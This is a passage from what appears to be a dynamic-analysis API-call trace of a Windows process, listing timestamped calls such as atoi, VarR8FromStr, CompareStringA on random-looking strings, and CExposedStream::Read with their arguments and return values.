dblIn=0x645a344b, pfltOut=0x40dfe25a | out: pfltOut=0x40dfe25a) returned 0x0 [0059.656] VarI4FromStr (in: strIn="22630", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.656] atoi (_Str="31") returned 31 [0059.656] atoi (_Str="2415") returned 2415 [0059.656] atoi (_Str="2421") returned 2421 [0059.656] VarR8FromStr (in: strIn="12078.800713953", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.656] VarR4FromR8 (in: dblIn=0x7dcb78cb, pfltOut=0x40c79766 | out: pfltOut=0x40c79766) returned 0x0 [0059.656] atoi (_Str="349") returned 349 [0059.657] atoi (_Str="375") returned 375 [0059.657] VarI4FromStr (in: strIn="13353", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.657] VarR8FromStr (in: strIn="55949.209241906", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.657] VarR4FromR8 (in: dblIn=0xb21c14e7, pfltOut=0x40eb51a6 | out: pfltOut=0x40eb51a6) returned 0x0 [0059.657] VarI4FromStr (in: strIn="10215", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.658] atoi (_Str="45") returned 45 [0059.658] atoi (_Str="2188") returned 2188 [0059.658] atoi (_Str="2176") returned 2176 [0059.658] VarR8FromStr (in: strIn="46513.052769809", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.658] VarR4FromR8 (in: dblIn=0xb04a4f7c, pfltOut=0x40e6b621 | out: pfltOut=0x40e6b621) returned 0x0 [0059.659] VarI4FromStr (in: strIn="10215", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.659] atoi (_Str="45") returned 45 [0059.659] CRetailMalloc_Realloc () returned 0x76fc6a8 [0059.659] atoi (_Str="2188") returned 2188 [0059.659] atoi (_Str="2176") returned 2176 [0059.659] atoi (_Str="0") returned 0 [0059.659] atoi (_Str="9196") returned 9196 [0059.660] atoi (_Str="122") returned 122 [0059.660] atoi (_Str="221") returned 221 [0059.660] atoi (_Str="2188") returned 2188 [0059.660] atoi (_Str="2176") returned 2176 [0059.660] VarI4FromStr (in: strIn="28213", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.660] VarI4FromStr (in: strIn="30660", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.660] atoi (_Str="1022") returned 1022 [0059.661] atoi (_Str="501") returned 501 [0059.661] atoi (_Str="469") returned 469 [0059.661] VarR8FromStr (in: strIn="51484.318143633", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.661] VarR4FromR8 (in: dblIn=0x2e3b8e65, pfltOut=0x40e9238a | out: pfltOut=0x40e9238a) returned 0x0 [0059.664] atoi (_Str="122") returned 122 [0059.664] atoi (_Str="221") returned 221 [0059.664] atoi (_Str="2188") returned 2188 [0059.664] atoi (_Str="2176") returned 2176 [0059.664] VarR8FromStr (in: strIn="25023.018742315", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.664] VarR4FromR8 (in: dblIn=0x3312f77e, pfltOut=0x40d86fc1 | out: pfltOut=0x40d86fc1) returned 0x0 [0059.664] VarI4FromStr (in: strIn="30660", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.665] atoi (_Str="1022") returned 1022 [0059.665] VarI4FromStr (in: strIn="516335314", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.665] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="QK0tvkr", cchCount1=-1, lpString2="nRMiQ2oJj", cchCount2=-1) returned 3 [0059.665] VarI4FromStr (in: strIn="10215", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.665] atoi (_Str="45") returned 45 [0059.665] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="QK0tvkr", cchCount1=-1, lpString2="nRMiQ2oJj", cchCount2=-1) returned 3 [0059.665] atoi (_Str="2188") returned 2188 [0059.665] atoi (_Str="2176") returned 2176 [0059.666] atoi (_Str="5017") returned 5017 [0059.666] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.666] atoi (_Str="183") returned 183 [0059.666] atoi (_Str="4842") returned 4842 [0059.666] atoi (_Str="4839") returned 4839 [0059.667] atoi (_Str="6850") returned 6850 [0059.667] atoi (_Str="274") returned 274 [0059.667] VarR8FromStr (in: strIn="24272.482994124", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.667] VarR4FromR8 (in: dblIn=0xe9602faf, pfltOut=0x40d7b41e | out: pfltOut=0x40d7b41e) returned 0x0 [0059.667] atoi (_Str="96") returned 96 [0059.667] atoi (_Str="160") returned 160 [0059.670] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.670] atoi (_Str="183") returned 183 [0059.670] atoi (_Str="4842") returned 4842 [0059.670] atoi (_Str="4839") returned 4839 [0059.670] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="eAi3EytK", cchCount1=-1, lpString2="pkP68v", cchCount2=-1) returned 1 [0059.671] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.671] atoi (_Str="183") returned 183 [0059.671] atoi (_Str="4842") returned 4842 [0059.671] atoi (_Str="4839") returned 4839 [0059.671] atoi (_Str="6850") returned 6850 [0059.671] atoi (_Str="274") returned 274 [0059.671] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="mx2Fre", cchCount1=-1, lpString2="a5anxWw", cchCount2=-1) returned 3 [0059.671] atoi (_Str="0") returned 0 [0059.672] atoi (_Str="96") returned 96 [0059.672] atoi (_Str="160") returned 160 [0059.672] atoi (_Str="34") returned 34 [0059.672] VarI4FromStr (in: strIn="23424", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.672] atoi (_Str="183") returned 183 [0059.673] atoi (_Str="4842") returned 4842 [0059.673] atoi (_Str="4839") returned 4839 [0059.673] atoi (_Str="0") returned 0 [0059.673] atoi (_Str="6850") returned 6850 [0059.673] atoi (_Str="274") returned 274 [0059.673] VarI4FromStr (in: strIn="14382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.673] atoi (_Str="96") returned 96 [0059.673] atoi (_Str="160") returned 160 [0059.673] atoi (_Str="86") returned 86 [0059.674] atoi (_Str="523") returned 523 [0059.674] atoi (_Str="3") returned 3 [0059.674] atoi (_Str="2058") returned 2058 [0059.674] atoi (_Str="2046") returned 2046 [0059.675] atoi (_Str="523") returned 523 [0059.675] atoi (_Str="3") returned 3 [0059.675] atoi (_Str="2058") returned 2058 [0059.675] atoi (_Str="2046") returned 2046 [0059.675] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="yovtYUq", cchCount1=-1, lpString2="biUn5SaK", cchCount2=-1) returned 3 [0059.675] atoi (_Str="175") returned 175 [0059.675] atoi (_Str="146") returned 146 [0059.675] atoi (_Str="0") returned 0 [0059.675] atoi (_Str="221") returned 221 [0059.675] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="yovtYUq", cchCount1=-1, lpString2="biUn5SaK", cchCount2=-1) returned 3 [0059.675] atoi (_Str="523") returned 523 [0059.675] atoi (_Str="3") returned 3 [0059.676] CRetailMalloc_Realloc () returned 0x7426110 [0059.676] atoi (_Str="2058") returned 2058 [0059.676] atoi (_Str="2046") returned 2046 [0059.676] VarI4FromStr (in: strIn="76376764", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.676] atoi (_Str="189") returned 189 [0059.676] atoi (_Str="74") returned 74 [0059.676] atoi (_Str="920") returned 920 [0059.676] atoi (_Str="907") returned 907 [0059.676] VarI4FromStr (in: strIn="21608", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.676] atoi (_Str="831") returned 831 [0059.676] atoi (_Str="812") returned 812 [0059.676] VarI4FromStr (in: strIn="21608", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.677] VarR8FromStr (in: strIn="2593.2032835026", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.677] VarR4FromR8 (in: dblIn=0x14c676f7, pfltOut=0x40a44268 | out: pfltOut=0x40a44268) returned 0x0 [0059.677] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="PJWAsvQ6", cchCount1=-1, lpString2="GYUQpKt", cchCount2=-1) returned 3 [0059.677] atoi (_Str="189") returned 189 [0059.677] atoi (_Str="74") returned 74 [0059.677] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="PJWAsvQ6", cchCount1=-1, lpString2="GYUQpKt", cchCount2=-1) returned 3 [0059.677] atoi (_Str="920") returned 920 [0059.677] atoi (_Str="907") returned 907 [0059.677] VarI4FromStr (in: strIn="24284", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.677] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="PJWAsvQ6", cchCount1=-1, lpString2="GYUQpKt", cchCount2=-1) returned 3 [0059.677] atoi (_Str="831") returned 831 [0059.677] atoi (_Str="812") returned 812 [0059.678] atoi (_Str="0") returned 0 [0059.678] VarR8FromStr (in: strIn="50961.334532448", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.678] VarR4FromR8 (in: dblIn=0xb47d6474, pfltOut=0x40e8e22a | out: pfltOut=0x40e8e22a) returned 0x0 [0059.678] atoi (_Str="189") returned 189 [0059.678] atoi (_Str="74") returned 74 [0059.678] atoi (_Str="920") returned 920 [0059.678] atoi (_Str="907") returned 907 [0059.678] atoi (_Str="831") returned 831 [0059.678] atoi (_Str="812") returned 812 [0059.678] atoi (_Str="204") returned 204 [0059.678] atoi (_Str="204") returned 204 [0059.678] atoi (_Str="535") returned 535 [0059.678] atoi (_Str="468") returned 468 [0059.679] atoi (_Str="920") returned 920 [0059.679] atoi (_Str="907") returned 907 [0059.679] atoi (_Str="831") returned 831 [0059.679] atoi (_Str="812") returned 812 [0059.679] atoi (_Str="101") returned 101 [0059.679] atoi (_Str="3745") returned 3745 [0059.679] atoi (_Str="107") returned 107 [0059.679] VarR8FromStr (in: strIn="1369.178012773", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.679] VarR4FromR8 (in: dblIn=0x48faf939, pfltOut=0x409564b6 | out: pfltOut=0x409564b6) returned 0x0 [0059.679] atoi (_Str="101") returned 101 [0059.679] atoi (_Str="535") returned 535 [0059.679] atoi (_Str="468") returned 468 [0059.679] atoi (_Str="920") returned 920 [0059.679] atoi (_Str="907") returned 907 [0059.680] VarR8FromStr (in: strIn="52555.004319324", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.680] VarR4FromR8 (in: dblIn=0x2362476a, pfltOut=0x40e9a960 | out: pfltOut=0x40e9a960) returned 0x0 [0059.680] atoi (_Str="831") returned 831 [0059.680] atoi (_Str="812") returned 812 [0059.680] atoi (_Str="12") returned 12 [0059.680] atoi (_Str="3745") returned 3745 [0059.680] atoi (_Str="107") returned 107 [0059.680] VarI4FromStr (in: strIn="28388", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.680] atoi (_Str="0") returned 0 [0059.680] atoi (_Str="798") returned 798 [0059.680] atoi (_Str="1") returned 1 [0059.680] CExposedStream::Read () returned 0x0 [0059.680] CExposedStream::Read () returned 0x0 [0059.680] atoi (_Str="3247") returned 3247 [0059.681] atoi (_Str="3238") returned 3238 [0059.681] atoi (_Str="0") returned 0 [0059.681] atoi (_Str="691") returned 691 [0059.681] atoi (_Str="662") returned 662 [0059.681] atoi (_Str="0") returned 0 [0059.681] atoi (_Str="798") returned 798 [0059.681] atoi (_Str="1") returned 1 [0059.681] atoi (_Str="3247") returned 3247 [0059.681] atoi (_Str="3238") returned 3238 [0059.681] VarR8FromStr (in: strIn="47118.731929256", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.681] VarR4FromR8 (in: dblIn=0x6bf6e730, pfltOut=0x40e701d7 | out: pfltOut=0x40e701d7) returned 0x0 [0059.681] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="WV4lv9Q", cchCount1=-1, lpString2="eve3JGT", cchCount2=-1) returned 3 [0059.681] atoi (_Str="798") returned 798 [0059.682] atoi (_Str="1") returned 1 [0059.682] atoi (_Str="3247") returned 3247 [0059.682] atoi (_Str="3238") returned 3238 [0059.682] VarI4FromStr (in: strIn="15045", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.682] VarR8FromStr (in: strIn="11781.50742121", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.682] VarR4FromR8 (in: dblIn=0xf32d9f20, pfltOut=0x40c702c0 | out: pfltOut=0x40c702c0) returned 0x0 [0059.682] atoi (_Str="273") returned 273 [0059.682] atoi (_Str="357") returned 357 [0059.682] atoi (_Str="850") returned 850 [0059.682] atoi (_Str="838") returned 838 [0059.682] atoi (_Str="43") returned 43 [0059.682] atoi (_Str="218") returned 218 [0059.682] atoi (_Str="187") returned 187 [0059.683] VarI4FromStr (in: strIn="1406763360", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.683] atoi (_Str="43") returned 43 [0059.683] atoi (_Str="6") returned 6 [0059.683] VarR8FromStr (in: strIn="16378.827776765", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.683] VarR4FromR8 (in: dblIn=0xf496cb08, pfltOut=0x40cffd69 | out: pfltOut=0x40cffd69) returned 0x0 [0059.683] atoi (_Str="273") returned 273 [0059.683] atoi (_Str="357") returned 357 [0059.683] atoi (_Str="850") returned 850 [0059.683] atoi (_Str="838") returned 838 [0059.683] VarR8FromStr (in: strIn="39596.438212389", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.683] VarR4FromR8 (in: dblIn=0x5d5fcef, pfltOut=0x40e3558e | out: pfltOut=0x40e3558e) returned 0x0 [0059.683] atoi (_Str="218") returned 218 [0059.683] atoi (_Str="187") returned 187 [0059.684] atoi (_Str="273") returned 273 [0059.684] atoi (_Str="357") returned 357 [0059.684] atoi (_Str="850") returned 850 [0059.684] atoi (_Str="838") returned 838 [0059.684] atoi (_Str="0") returned 0 [0059.684] atoi (_Str="218") returned 218 [0059.684] atoi (_Str="187") returned 187 [0059.684] VarR8FromStr (in: strIn="32294.881001479", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.684] VarR4FromR8 (in: dblIn=0x62540702, pfltOut=0x40df89b8 | out: pfltOut=0x40df89b8) returned 0x0 [0059.684] atoi (_Str="43") returned 43 [0059.684] atoi (_Str="6") returned 6 [0059.685] VarR8FromStr (in: strIn="32294.881001479", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.685] VarR4FromR8 (in: dblIn=0x62540702, pfltOut=0x40df89b8 | out: pfltOut=0x40df89b8) returned 0x0 [0059.685] atoi (_Str="222") returned 222 [0059.685] atoi (_Str="321") returned 321 [0059.685] atoi (_Str="2117") returned 2117 [0059.685] atoi (_Str="2132") returned 2132 [0059.685] VarI4FromStr (in: strIn="11434", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.685] atoi (_Str="222") returned 222 [0059.685] atoi (_Str="321") returned 321 [0059.685] atoi (_Str="2117") returned 2117 [0059.685] atoi (_Str="2132") returned 2132 [0059.685] VarR8FromStr (in: strIn="1113.7650330463", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.685] VarR4FromR8 (in: dblIn=0x64d2a8df, pfltOut=0x4091670f | out: pfltOut=0x4091670f) returned 0x0 [0059.685] atoi (_Str="312") returned 312 [0059.686] atoi (_Str="285") returned 285 [0059.686] atoi (_Str="0") returned 0 [0059.686] VarR8FromStr (in: strIn="1113.7650330463", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.686] VarR4FromR8 (in: dblIn=0x64d2a8df, pfltOut=0x4091670f | out: pfltOut=0x4091670f) returned 0x0 [0059.686] VarI4FromStr (in: strIn="11005", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.686] atoi (_Str="155") returned 155 [0059.686] atoi (_Str="2117") returned 2117 [0059.686] atoi (_Str="2132") returned 2132 [0059.686] VarI4FromStr (in: strIn="20982", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.686] atoi (_Str="312") returned 312 [0059.686] atoi (_Str="285") returned 285 [0059.686] VarR8FromStr (in: strIn="27762.362789976", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.686] VarR4FromR8 (in: dblIn=0x37f3728f, pfltOut=0x40db1c97 | out: pfltOut=0x40db1c97) returned 0x0 [0059.687] atoi (_Str="723") returned 723 [0059.687] atoi (_Str="676") returned 676 [0059.687] atoi (_Str="222") returned 222 [0059.687] atoi (_Str="321") returned 321 [0059.687] atoi (_Str="2117") returned 2117 [0059.687] atoi (_Str="2132") returned 2132 [0059.687] VarR8FromStr (in: strIn="39050.813405542", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.687] VarR4FromR8 (in: dblIn=0x76b0f29, pfltOut=0x40e3115a | out: pfltOut=0x40e3115a) returned 0x0 [0059.687] atoi (_Str="8547") returned 8547 [0059.687] atoi (_Str="777") returned 777 [0059.687] atoi (_Str="5147") returned 5147 [0059.687] atoi (_Str="5151") returned 5151 [0059.687] atoi (_Str="233") returned 233 [0059.687] atoi (_Str="206") returned 206 [0059.688] VarR8FromStr (in: strIn="59476.055088469", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.688] VarR4FromR8 (in: dblIn=0xc348e498, pfltOut=0x40ed0a81 | out: pfltOut=0x40ed0a81) returned 0x0 [0059.688] atoi (_Str="365") returned 365 [0059.688] atoi (_Str="101") returned 101 [0059.688] atoi (_Str="5147") returned 5147 [0059.688] atoi (_Str="5151") returned 5151 [0059.688] atoi (_Str="365") returned 365 [0059.688] atoi (_Str="101") returned 101 [0059.688] atoi (_Str="5147") returned 5147 [0059.688] atoi (_Str="5151") returned 5151 [0059.688] CRetailMalloc_Realloc () returned 0x7759f50 [0059.688] VarR8FromStr (in: strIn="53522.322654206", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.688] VarR4FromR8 (in: dblIn=0x532ee9d6, pfltOut=0x40ea224a | out: pfltOut=0x40ea224a) returned 0x0 [0059.689] atoi (_Str="8547") returned 8547 [0059.689] atoi (_Str="777") returned 777 [0059.689] atoi (_Str="5147") returned 5147 [0059.689] atoi (_Str="5151") returned 5151 [0059.689] atoi (_Str="365") returned 365 [0059.689] atoi (_Str="101") returned 101 [0059.689] atoi (_Str="5147") returned 5147 [0059.689] atoi (_Str="5151") returned 5151 [0059.689] VarR8FromStr (in: strIn="36821.763770255", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.689] VarR4FromR8 (in: dblIn=0x70ce515c, pfltOut=0x40e1fab8 | out: pfltOut=0x40e1fab8) returned 0x0 [0059.689] atoi (_Str="0") returned 0 [0059.689] atoi (_Str="62") returned 62 [0059.689] atoi (_Str="64") returned 64 [0059.690] VarI4FromStr (in: strIn="18900", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.690] atoi (_Str="6300") returned 6300 [0059.690] atoi (_Str="2311") returned 2311 [0059.690] atoi (_Str="62") returned 62 [0059.690] atoi (_Str="64") returned 64 [0059.690] VarI4FromStr (in: strIn="18900", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.690] atoi (_Str="6300") returned 6300 [0059.690] VarR8FromStr (in: strIn="43431.353737844", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.690] VarR4FromR8 (in: dblIn=0x51d206eb, pfltOut=0x40e534eb | out: pfltOut=0x40e534eb) returned 0x0 [0059.690] VarI4FromStr (in: strIn="18900", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.690] VarR8FromStr (in: strIn="42732.264166486", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.691] VarR4FromR8 (in: dblIn=0x740d4642, pfltOut=0x40e4dd88 | out: pfltOut=0x40e4dd88) returned 0x0 [0059.691] VarI4FromStr (in: strIn="25738", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.691] VarR8FromStr (in: strIn="42732.264166486", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.691] VarR4FromR8 (in: dblIn=0x740d4642, pfltOut=0x40e4dd88 | out: pfltOut=0x40e4dd88) returned 0x0 [0059.691] VarI4FromStr (in: strIn="20224", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.691] VarI4FromStr (in: strIn="195663642", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.691] VarI4FromStr (in: strIn="20224", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.691] VarR8FromStr (in: strIn="41303.87494315", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.691] VarR4FromR8 (in: dblIn=0xff88c6e3, pfltOut=0x40e42afb | out: pfltOut=0x40e42afb) returned 0x0 [0059.691] VarI4FromStr (in: strIn="20224", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.691] VarI4FromStr (in: strIn="20224", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarR8FromStr (in: strIn="5264.7009219563", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.692] VarR4FromR8 (in: dblIn=0x6f9f0f5b, pfltOut=0x40b490b3 | out: pfltOut=0x40b490b3) returned 0x0 [0059.692] VarI4FromStr (in: strIn="20224", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarI4FromStr (in: strIn="17009", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarI4FromStr (in: strIn="13804", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarI4FromStr (in: strIn="22005", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarR8FromStr (in: strIn="42364.29482624", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.692] VarR4FromR8 (in: dblIn=0x6f37705a, pfltOut=0x40e4af89 | out: pfltOut=0x40e4af89) returned 0x0 [0059.692] VarI4FromStr (in: strIn="13804", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.692] VarI4FromStr (in: strIn="19501", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.693] VarI4FromStr (in: strIn="22005", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.693] VarR8FromStr (in: strIn="14801.641778119", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.693] VarR4FromR8 (in: dblIn=0x25c91032, pfltOut=0x40cce8d2 | out: pfltOut=0x40cce8d2) returned 0x0 [0059.693] VarI4FromStr (in: strIn="891302158", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.693] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="CSng", cchCount1=-1, lpString2="E18mS", cchCount2=-1) returned 1 [0059.693] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="CSng", cchCount1=-1, lpString2="E18mS", cchCount2=-1) returned 1 [0059.693] VarR8FromStr (in: strIn="3402.908967834", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.693] VarR4FromR8 (in: dblIn=0x643b604b, pfltOut=0x40aa95d1 | out: pfltOut=0x40aa95d1) returned 0x0 [0059.693] CExposedStream::Read () returned 0x0 [0059.693] CExposedStream::Read () returned 0x0 [0059.694] VarR8FromStr (in: strIn="33356.695333543", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.694] VarR4FromR8 (in: dblIn=0x402c2160, pfltOut=0x40e04996 | out: pfltOut=0x40e04996) returned 0x0 [0059.694] VarI4FromStr (in: strIn="14749", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.694] VarR8FromStr (in: strIn="14324.444853555", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.694] VarR4FromR8 (in: dblIn=0xf0f6171e, pfltOut=0x40cbfa38 | out: pfltOut=0x40cbfa38) returned 0x0 [0059.694] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Database", cchCount1=-1, lpString2="Ub1P5", cchCount2=-1) returned 1 [0059.694] VarI4FromStr (in: strIn="12464", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.694] VarR8FromStr (in: strIn="35587.91076836", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.694] VarR4FromR8 (in: dblIn=0x2503b00e, pfltOut=0x40e1607d | out: pfltOut=0x40e1607d) returned 0x0 [0059.694] VarI4FromStr (in: strIn="13665", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.694] VarI4FromStr (in: strIn="13665", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.695] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="tHPaX" | out: _Dst="tHPaX") returned 0x0 [0059.695] VarR8FromStr (in: strIn="37196.738222307", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.695] VarR4FromR8 (in: dblIn=0x9f846338, pfltOut=0x40e22997 | out: pfltOut=0x40e22997) returned 0x0 [0059.695] VarR8FromStr (in: strIn="40514.471439815", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.695] VarR4FromR8 (in: dblIn=0x1608f36f, pfltOut=0x40e3c84f | out: pfltOut=0x40e3c84f) returned 0x0 [0059.695] VarI4FromStr (in: strIn="27218", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.695] CRetailMalloc_Realloc () returned 0x889a400 [0059.696] VarR8FromStr (in: strIn="24776.529820995", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.696] VarR4FromR8 (in: dblIn=0xe8965191, 